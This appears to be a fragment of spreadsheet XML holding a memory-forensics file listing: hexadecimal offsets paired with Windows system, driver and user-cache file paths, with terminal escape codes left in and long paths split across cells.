    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_ntsc_symphony_daaa4003771a0c78.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c9c88</t>
  </si>
  <si>
    <t>\Windows\rescache\ResCache.mni_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ca038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_aero_shell_a91dfa5124b343c4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ca1d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\avifil32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ca368</t>
  </si>
  <si>
    <t>\Windows\System32\mcbuilder.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ca488</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\27db10eb312c74aee99f58aa87ca</t>
  </si>
  <si>
    <t>00cb\System.S</t>
  </si>
  <si>
    <t>.Disco</t>
  </si>
  <si>
    <t>very.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cb438</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\brmfcwia.inf_x86_neutral_2d38149df9cd17c4\brmfcwi</t>
  </si>
  <si>
    <t>0xde6cb8e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\PresentationHost.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cbb28</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmhrtz.inf_x86_neutral_1c6813a32dde365f\mdmmhrt</t>
  </si>
  <si>
    <t>z.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cc038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services\v4.0_4.0.0.0__b77a5c561934e089\S</t>
  </si>
  <si>
    <t>ystem.Data.Se</t>
  </si>
  <si>
    <t>rvices.dll_x001B_</t>
  </si>
  <si>
    <t>0xde6cc188</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_rdyboost_95e76b07334dd353.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ccad8</t>
  </si>
  <si>
    <t>0xde6ccb90</t>
  </si>
  <si>
    <t>0xde6ccc48</t>
  </si>
  <si>
    <t>0xde6cd718</t>
  </si>
  <si>
    <t>\$MapAttributeValue_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cd838</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{137C39CA-EE44-4C05-94A</t>
  </si>
  <si>
    <t>B-B67C78450F7</t>
  </si>
  <si>
    <t>0xde6cda08</t>
  </si>
  <si>
    <t>0xde6ce150</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_termservice_f0fb244350031192.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ce738</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hpoa1sd.inf_x86_neutral_360cdfe0d1ef39bf\hpoa1sd.</t>
  </si>
  <si>
    <t>0xde6ceb68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\schtasks.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ced50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ndfapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cf4c0</t>
  </si>
  <si>
    <t>very.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6cf628</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\A</t>
  </si>
  <si>
    <t>A42uqJ[1].png</t>
  </si>
  <si>
    <t>0xde6cf6e0</t>
  </si>
  <si>
    <t>0xde6cf880</t>
  </si>
  <si>
    <t>0xde6cfa50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttte.inf_x86_neutral_a29230c136fdaf8e\mdmnttt</t>
  </si>
  <si>
    <t>0xde6cfc00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\0dab4307aa074762df9a8a12f0ed</t>
  </si>
  <si>
    <t>5d46\System.W</t>
  </si>
  <si>
    <t>eb.Abstract</t>
  </si>
  <si>
    <t>ions.n</t>
  </si>
  <si>
    <t>0xde6cfcb8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\b78ee465b8fc2c63b0da1ccb4bbde5d8\Sy</t>
  </si>
  <si>
    <t>stem.Speech.n</t>
  </si>
  <si>
    <t>0xde6d01d8</t>
  </si>
  <si>
    <t>0xde6d0570</t>
  </si>
  <si>
    <t>0xde6d0a18</t>
  </si>
  <si>
    <t>gn.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d0f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\2603872fd7584bfcc452db401b04021a\Xsd</t>
  </si>
  <si>
    <t>BuildTask.ni.</t>
  </si>
  <si>
    <t>0xde6d1510</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.D</t>
  </si>
  <si>
    <t>evice.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d1c98</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d1f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1BB09BEEC155258835C193A7AA</t>
  </si>
  <si>
    <t>85AA5B_9C2FED</t>
  </si>
  <si>
    <t>45DE7A4D399</t>
  </si>
  <si>
    <t>C265A2</t>
  </si>
  <si>
    <t>242CFB103_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d21f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices.AccountManagement\v4.0_4.0.0</t>
  </si>
  <si>
    <t>.0__b77a5c561</t>
  </si>
  <si>
    <t>934e089\Sys</t>
  </si>
  <si>
    <t>tem.Di</t>
  </si>
  <si>
    <t>rectoryServices.AccountManagement.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d24e8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E</t>
  </si>
  <si>
    <t>43B18_BEB37AB</t>
  </si>
  <si>
    <t>ADF39714871</t>
  </si>
  <si>
    <t>232B47</t>
  </si>
  <si>
    <t>92417E04_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d28d0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\da1187376a4b34b174480b70328e</t>
  </si>
  <si>
    <t>a159\System.W</t>
  </si>
  <si>
    <t>ns.ni.</t>
  </si>
  <si>
    <t>0xde6d2d80</t>
  </si>
  <si>
    <t>0xde6d2ec8</t>
  </si>
  <si>
    <t>0xde6d2f80</t>
  </si>
  <si>
    <t>0xde6d3038</t>
  </si>
  <si>
    <t>0xde6d3b70</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmcndmgr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d3db8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttp2.inf_x86_neutral_5e37ec17d0b5ace7\mdmnttp</t>
  </si>
  <si>
    <t>0xde6d4378</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mydocs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d45f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wsecedit.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d48f8</t>
  </si>
  <si>
    <t>\Windows\System32\AltTab.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d4a18</t>
  </si>
  <si>
    <t>0xde6d4c70</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.5_1033_b573e20073d26166.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d4df0</t>
  </si>
  <si>
    <t>0xde6d4ea8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\abbf143805745cd63ff8f04405f9</t>
  </si>
  <si>
    <t>dd02\System.S</t>
  </si>
  <si>
    <t>.Servi</t>
  </si>
  <si>
    <t>ceMoniker40.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d51a0</t>
  </si>
  <si>
    <t>\Windows\System32\sqlcese30.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d54c0</t>
  </si>
  <si>
    <t>AccountManagement.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d5be0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\</t>
  </si>
  <si>
    <t>Accessories\D</t>
  </si>
  <si>
    <t>esktop.ini_x001B_</t>
  </si>
  <si>
    <t>0xde6d5d00</t>
  </si>
  <si>
    <t>0xde6d5f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_servicing_gc32_972ee38cf65a9c2f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d6038</t>
  </si>
  <si>
    <t>0xde6d6218</t>
  </si>
  <si>
    <t>0xde6d64f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\autoplay.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d6ba0</t>
  </si>
  <si>
    <t>0xde6d6f80</t>
  </si>
  <si>
    <t>ices.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d7038</t>
  </si>
  <si>
    <t>0xde6d7568</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tapiui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d7f80</t>
  </si>
  <si>
    <t>0xde6d8038</t>
  </si>
  <si>
    <t>0xde6d8548</t>
  </si>
  <si>
    <t>els.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d8670</t>
  </si>
  <si>
    <t>\Windows\ehome\ehSSO.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d8830</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\advpack.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d9550</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\samsrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d9d28</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\mouhid.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6d9f80</t>
  </si>
  <si>
    <t>\Windows\System32\msls31.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6da038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_sonata_6b55eb3f91aab49e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6da568</t>
  </si>
  <si>
    <t>ng.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6da878</t>
  </si>
  <si>
    <t>\Windows\ehome\en-US\ehsched.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6da930</t>
  </si>
  <si>
    <t>\Windows\ehome\en-US\ehmsas.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dabd0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pmcsnap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6daf18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\TaskEng.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6db178</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\webcheck.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6db2c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\6a42abeeb03b31f73850bba175bc5</t>
  </si>
  <si>
    <t>33a\System.Xa</t>
  </si>
  <si>
    <t>ml.Hosting.</t>
  </si>
  <si>
    <t>0xde6dbeb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_eapmethods_2935fdc1307d3ad6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dc328</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-us_theme_887982f66eeeb343.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dc560</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\aelupsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dc8b8</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\Segment1.cmf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dcaa0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayermedialibrary_64611465e9119df8</t>
  </si>
  <si>
    <t>0xde6dcd88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wer.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dd2b8</t>
  </si>
  <si>
    <t>0xde6dd5f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_bits_0ef6f148bde367d9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6dda28</t>
  </si>
  <si>
    <t>0xde6ddc00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugthrsvc_0409_8451c270df70bfac.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ddf80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_fr-fr_da1fe64829be028f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6de190</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fvecpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6de560</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_authman_27829e1b3df01691.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6de618</t>
  </si>
  <si>
    <t>0xde6de850</t>
  </si>
  <si>
    <t>0xde6de990</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\bthprops.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6deb78</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\explorerframe.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6df288</t>
  </si>
  <si>
    <t>\Windows\System32\radardt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6df888</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnle002.inf_x86_neutral_e9f41ef23faed72b\prnle00</t>
  </si>
  <si>
    <t>0xde6dfb08</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\diskcopy.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e03f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_performance_winsat_ac47b36afb2fa68e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e0650</t>
  </si>
  <si>
    <t>0xde6e07f0</t>
  </si>
  <si>
    <t>\Windows\System32\vsstrace.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e0b70</t>
  </si>
  <si>
    <t>\$BitMap_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e0d60</t>
  </si>
  <si>
    <t>\Windows\System32\wermgr.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e14c0</t>
  </si>
  <si>
    <t>0xde6e1600</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\WebCache\V01.chk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e16b8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e1a38</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msutb.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e1c80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msadp32.acm.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e1ec8</t>
  </si>
  <si>
    <t>0xde6e1f80</t>
  </si>
  <si>
    <t>0xde6e2130</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-us_rssfeed_41d427d3ce5de0ec.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e23c0</t>
  </si>
  <si>
    <t>0xde6e2478</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msports.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e27b0</t>
  </si>
  <si>
    <t>\Windows\System32\mctres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e2938</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imekr8_dicts_2ff7cb9394decb12.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e2d70</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\filemgmt.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e3038</t>
  </si>
  <si>
    <t>ceMoniker40.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e32d0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\a84aea7df97041ba4cda6b7f2f7535</t>
  </si>
  <si>
    <t>e8\System.Web</t>
  </si>
  <si>
    <t>.Routing.ni</t>
  </si>
  <si>
    <t>0xde6e3408</t>
  </si>
  <si>
    <t>0xde6e3820</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\taskmgr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e3970</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr005.inf_x86_neutral_407befecac90c7f1\prnbr00</t>
  </si>
  <si>
    <t>0xde6e3af8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5F25B5EA5632522AD42804741A</t>
  </si>
  <si>
    <t>0FB270_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e3eb8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\fltmgr.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e4038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_networking_29c6b61ce45e9171.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e42d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\eappcfg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e4388</t>
  </si>
  <si>
    <t>0xde6e4a28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wscsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e4c70</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\arc.inf_x86_neutral_11b52dec8e94d9aa\arc.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e4e58</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msobjs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e5558</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\eapsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e5968</t>
  </si>
  <si>
    <t>s.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e5a98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_boot_06654401df2fc50e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e64d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\VAN.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e6750</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msvfw32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e6ba8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\irprops.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e6df0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\afd.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e7038</t>
  </si>
  <si>
    <t>\Windows\ehome\en-US\ehrecvr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e70f0</t>
  </si>
  <si>
    <t>\Windows\ehome\en-US\ehrec.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e73f8</t>
  </si>
  <si>
    <t>0xde6e7560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj3.inf_x86_neutral_4af0d99c5345ea90\mdmtdkj</t>
  </si>
  <si>
    <t>0xde6e7e48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\fa0ee062828c8880bf6142182b29</t>
  </si>
  <si>
    <t>45fe\System.X</t>
  </si>
  <si>
    <t>ml.Serializ</t>
  </si>
  <si>
    <t>ation.</t>
  </si>
  <si>
    <t>0xde6e82b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gptext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e8448</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_fonts_40104ba9a1d20dac.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e8500</t>
  </si>
  <si>
    <t>\Windows\en-US\explorer.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e8900</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\thumbcache.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e8f18</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\pcmcia.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e90f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\stobject.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e9368</t>
  </si>
  <si>
    <t>0xde6e95d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mctres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e9948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00c.inf_x86_neutral_92ff44dcbf1c760c\prnep00</t>
  </si>
  <si>
    <t>c.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6e9c98</t>
  </si>
  <si>
    <t>0xde6ea8f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\FXSRESM.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6eaa18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\xnacc.inf_x86_neutral_13c4e272a96185a1\xnacc.inf_x001B_</t>
  </si>
  <si>
    <t>0xde6eaee8</t>
  </si>
  <si>
    <t>0xde6eb510</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homepremiume_35794f97aba466da.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde6eb8f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homebasic_254ee2d1432fe5da.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ebbc0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hidir.inf_x86_neutral_a7b6b38a183ef6fe\hidir.inf_x001B_</t>
  </si>
  <si>
    <t>0xde6ebce0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homebasicn_65b9fc5d628f3f6a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ebec8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\74e379ad26e030ed888cada87f39</t>
  </si>
  <si>
    <t>e31c\System.W</t>
  </si>
  <si>
    <t>orkflowServ</t>
  </si>
  <si>
    <t>ices.n</t>
  </si>
  <si>
    <t>0xde6ebf80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{280DD9F5-9ED9-4828-9D8</t>
  </si>
  <si>
    <t>0-96360B45D79</t>
  </si>
  <si>
    <t>0xde6ec430</t>
  </si>
  <si>
    <t>Visualization.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ecbd0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmzyxel.inf_x86_neutral_a555079da4bd8392\mdmzyxe</t>
  </si>
  <si>
    <t>0xde6ece50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\TabSvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ed128</t>
  </si>
  <si>
    <t>Model.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ed4d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ulib.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ed680</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmusrgl.inf_x86_neutral_cc23f8899b453d6c\mdmusrg</t>
  </si>
  <si>
    <t>0xde6ede18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-gb_wallpaper_e474064dc62e18eb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ee1c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mblctr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6eea10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\brmfport.inf_x86_neutral_401d08f12a7f8ee1\brmfpor</t>
  </si>
  <si>
    <t>0xde6ef1b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\reg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ef828</t>
  </si>
  <si>
    <t>0xde6ef8e0</t>
  </si>
  <si>
    <t>0xde6ef998</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-us_link_5f6dbb3b2c805e48.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6efe20</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rstrui.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f0038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_policydefinitions_en-us_3b1c5b998da0d4ae.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f0f80</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\boost_date_time-vc100-mt-1_49.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f1038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\brmfcumd.inf_x86_neutral_e78e46b32f6347a3\brmfcum</t>
  </si>
  <si>
    <t>d.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f11c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shwebsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f1278</t>
  </si>
  <si>
    <t>0xde6f15a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\dot4.inf_x86_neutral_b079cf65ff1cb755\dot4.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde6f1a58</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\winhttp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f1bd8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\upnphost.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f1f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\authfwgp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f23c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cscript.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f25e8</t>
  </si>
  <si>
    <t>0xde6f2808</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\sqmapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f3038</t>
  </si>
  <si>
    <t>0xde6f3268</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tbssvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f3448</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00x.inf_x86_neutral_4dacaa756f2a85fc\prnca00</t>
  </si>
  <si>
    <t>0xde6f3660</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netshell.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f3718</t>
  </si>
  <si>
    <t>0xde6f37e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\imapi2fs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f3a58</t>
  </si>
